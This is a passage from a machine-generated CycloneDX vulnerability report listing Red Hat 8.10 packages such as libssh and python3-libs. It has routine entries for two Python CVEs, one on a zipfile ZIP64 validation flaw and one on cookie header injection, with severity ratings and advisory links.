          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-8291",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1285
      ],
      "description": "The 'zipfile' module would not check the validity of the ZIP64 End of\nCentral Directory (EOCD) Locator record offset value would not be used to\nlocate the ZIP64 EOCD record, instead the ZIP64 EOCD record would be\nassumed to be the previous record in the ZIP archive. This could be abused\nto create ZIP archives that are handled differently by the 'zipfile' module\ncompared to other ZIP implementations.\n\n\nRemediation maintains this behavior, but checks that the offset specified\nin the ZIP64 EOCD Locator record matches the expected value.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-8291"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23342"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23940"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-8291"
        },
        {
          "url": "https://bugzilla.redhat.com/2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5642"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6069"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8291"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2025-23940.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:23342"
        },
        {
          "url": "https://github.com/google/security-research/security/advisories/GHSA-hhv7-p4pg-wm6p"
        },
        {
          "url": "https://github.com/psf/advisory-database/blob/main/advisories/python/PSF-2025-12.json"
        },
        {
          "url": "https://github.com/python/cpython/commit/162997bb70e067668c039700141770687bc8f267"
        },
        {
          "url": "https://github.com/python/cpython/commit/1d29afb0d6218aa8fb5e1e4a6133a4778d89bb46"
        },
        {
          "url": "https://github.com/python/cpython/commit/333d4a6f4967d3ace91492a39ededbcf3faa76a6"
        },
        {
          "url": "https://github.com/python/cpython/commit/76437ac248ad8ca44e9bf697b02b1e2241df2196"
        },
        {
          "url": "https://github.com/python/cpython/commit/8392b2f0d35678407d9ce7d95655a5b77de161b4"
        },
        {
          "url": "https://github.com/python/cpython/commit/bca11ae7d575d87ed93f5dd6a313be6246e3e388"
        },
        {
          "url": "https://github.com/python/cpython/commit/d11e69d6203080e3ec450446bfed0516727b85c3"
        },
        {
          "url": "https://github.com/python/cpython/issues/139700"
        },
        {
          "url": "https://github.com/python/cpython/pull/139702"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-8291.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-0123.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/QECOPWMTH4VPPJAXAH2BGTA4XADOP62G/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8291"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7886-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7886-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-8291"
        }
      ],
      "published": "2025-10-07T18:16:00+00:00",
      "updated": "2026-07-31T14:16:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0672",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "When using http.cookies.Morsel, user-controlled cookie values and parameters can allow injecting HTTP headers into messages. Patch rejects all control characters within cookie names, values, and parameters.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0672"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0672"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19177"
        },
        {
          "url": "https://github.com/python/cpython/commit/62700107418eb2cca3fc88da036a243ea975f172"
        },
        {
          "url": "https://github.com/python/cpython/commit/712452e6f1d4b9f7f8c4c92ebfcaac1705faa440"
        },
        {
          "url": "https://github.com/python/cpython/commit/7852d72b653fea0199acf5fc2a84f6f8b84eba8d"
        },
        {
          "url": "https://github.com/python/cpython/commit/918387e4912d12ffc166c8f2a38df92b6ec756ca"
        },
        {
          "url": "https://github.com/python/cpython/commit/95746b3a13a985787ef53b977129041971ed7f70"
        },
        {
          "url": "https://github.com/python/cpython/commit/b1869ff648bbee0717221d09e6deff46617f3e85"
        },
        {
          "url": "https://github.com/python/cpython/issues/143919"
        },
        {
          "url": "https://github.com/python/cpython/pull/143920"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0672.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/6VFLQQEIX673KXKFUZXCUNE5AZOGZ45M/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0672"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-3"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0672"
        }
      ],
      "published": "2026-01-20T22:15:52+00:00",
      "updated": "2026-06-17T10:11:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
